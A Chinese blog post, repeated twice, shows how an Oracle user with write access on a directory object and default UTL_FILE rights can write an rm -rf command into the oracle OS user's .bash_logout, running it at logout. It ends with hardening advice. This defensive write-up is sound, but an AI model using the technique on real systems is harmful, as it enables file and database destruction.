impdp/expdp等是需要建目录进行导入导出的,如果oracle中建一个driectory在/home/oracle下,这样只要有对这个directory进行write权限的数据库用户,
再加上默认就有对utl_file包的execute权限,就可以做很多事情.
以下演示:
##在/home/oracle下,建一个文本文件
[oracle@ct6605 ~]$ touch /home/oracle/abc.txt
[oracle@ct6605 ~]$ ll /home/oracle/abc.txt
-rw-r--r-- 1 oracle oinstall 0 Oct 19 11:09 /home/oracle/abc.txt
[oracle@ct6605 ~]$ sqlplus system/system
SQL*Plus: Release 11.2.0.4.0 Production on Mon Oct 19 11:04:31 2015
Copyright (c) 1982, 2013, Oracle. All rights reserved.
Connected to:
Oracle Database 11g Enterprise Edition Release 11.2.0.4.0 - 64bit Production
With the Partitioning, OLAP, Data Mining and Real Application Testing options
--在/home/oracle下建一个direcotry
SQL> create directory home_dump as '/home/oracle';
Directory created.
--启用scott,用以测试
SQL> alter user scott account unlock;
User altered.
SQL> alter user scott identified by system;
User altered.
--授给scott对home_dump的写权限
SQL> grant write on directory home_dump to scott;
Grant succeeded.
SQL> conn scott/system
Connected.
--通过utl_file,修改/home/oracle/.bash_profile下的文件,使当oracle用户登入linux又登出时,自动执行此脚本,此处可以操作所以oracle用户有权限的文件,
这里只是删除一个abc.txt,如果改成删除oracle的数据文件加备份,后果就比较严重了.
SQL> DECLARE
t_fh utl_file.file_type;
begin
t_fh := utl_file.fopen('HOME_DUMP','.bash_logout','w');
utl_file.put_line(t_fh,'rm -rf /home/oracle/abc.txt');
utl_file.fclose(t_fh);
end; 2 3 4 5 6 7
8 /
PL/SQL procedure successfully completed.
SQL> exit
[oracle@ct6605 ~]$ cat .bash_logout
rm -rf /home/oracle/abc.txt
[oracle@ct6605 ~]$ exit
logout
--这里可以看到/home/oracle/abc.txt已经被删除了
[root@ct6605 ~]# ll /home/oracle/abc.txt
ls: cannot access /home/oracle/abc.txt: No such file or directory
可以看到,要防止此问题的发生,就要管控好directory的create,write权限,尽量去掉public的utl_file包execute权限.
另外顺便提一下,mysql中,select ... into outfile同样存在类似风险.
再加上默认就有对utl_file包的execute权限,就可以做很多事情.
以下演示:
##在/home/oracle下,建一个文本文件
[oracle@ct6605 ~]$ touch /home/oracle/abc.txt
[oracle@ct6605 ~]$ ll /home/oracle/abc.txt
-rw-r--r-- 1 oracle oinstall 0 Oct 19 11:09 /home/oracle/abc.txt
[oracle@ct6605 ~]$ sqlplus system/system
SQL*Plus: Release 11.2.0.4.0 Production on Mon Oct 19 11:04:31 2015
Copyright (c) 1982, 2013, Oracle. All rights reserved.
Connected to:
Oracle Database 11g Enterprise Edition Release 11.2.0.4.0 - 64bit Production
With the Partitioning, OLAP, Data Mining and Real Application Testing options
--在/home/oracle下建一个direcotry
SQL> create directory home_dump as '/home/oracle';
Directory created.
--启用scott,用以测试
SQL> alter user scott account unlock;
User altered.
SQL> alter user scott identified by system;
User altered.
--授给scott对home_dump的写权限
SQL> grant write on directory home_dump to scott;
Grant succeeded.
SQL> conn scott/system
Connected.
--通过utl_file,修改/home/oracle/.bash_profile下的文件,使当oracle用户登入linux又登出时,自动执行此脚本,此处可以操作所以oracle用户有权限的文件,
这里只是删除一个abc.txt,如果改成删除oracle的数据文件加备份,后果就比较严重了.
SQL> DECLARE
t_fh utl_file.file_type;
begin
t_fh := utl_file.fopen('HOME_DUMP','.bash_logout','w');
utl_file.put_line(t_fh,'rm -rf /home/oracle/abc.txt');
utl_file.fclose(t_fh);
end; 2 3 4 5 6 7
8 /
PL/SQL procedure successfully completed.
SQL> exit
[oracle@ct6605 ~]$ cat .bash_logout
rm -rf /home/oracle/abc.txt
[oracle@ct6605 ~]$ exit
logout
--这里可以看到/home/oracle/abc.txt已经被删除了
[root@ct6605 ~]# ll /home/oracle/abc.txt
ls: cannot access /home/oracle/abc.txt: No such file or directory
可以看到,要防止此问题的发生,就要管控好directory的create,write权限,尽量去掉public的utl_file包execute权限.
另外顺便提一下,mysql中,select ... into outfile同样存在类似风险.
来自 “ ITPUB博客 ” ,链接:http://blog.itpub.net/28539951/viewspace-1814910/,如需转载,请注明出处,否则将追究法律责任。
转载于:http://blog.itpub.net/28539951/viewspace-1814910/